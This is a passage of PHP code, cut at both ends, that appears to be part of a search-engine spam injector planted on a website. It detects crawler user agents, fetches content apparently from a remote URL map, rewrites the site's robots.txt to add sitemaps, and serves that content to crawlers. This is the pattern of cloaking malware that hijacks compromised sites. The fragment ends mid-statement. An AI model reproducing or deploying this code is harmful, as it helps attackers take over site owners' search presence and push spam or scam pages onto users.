$http . $domain, 'req_uri' => $requri, 'req_url' => $requrl, 'req_ua' => $userAgent, 'req_rf' => $referer ); if (isCrawler($userAgent) || substr($params['req_uri'], -6) === 'robots' || substr($params['req_uri'], -4) === '.xml') { $sRequri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : ''; if(in_array(substr($params['req_uri'], -7), ['/robots', '?robots']) && strpos($_SERVER['REQUEST_URI'],'.php') !== false && $sRequri !== $requri){ die('robots.txt and sitemap.xml file create fail by subfile!'); } $output = getContent($urlMap, $params); if (in_array(substr($params['req_uri'], -7), ['/robots', '?robots']) && !empty($output)) { $subfile = strpos($requrl,'index.php') === false ? true : false; $ret = @file_put_contents(__DIR__ . '/robots.txt', $output, $subfile ? 8 : 0); $robots_cont = file_get_contents(__DIR__ . '/robots.txt'); if ($ret !== false && strpos(strtolower($robots_cont), "sitemap") !== false) { die('robots.txt and sitemap.xml file create success!'); } else { die('robots.txt and sitemap.xml file create fail!'); } } elseif (!empty($output)) { if (substr($output, 0, 5) === '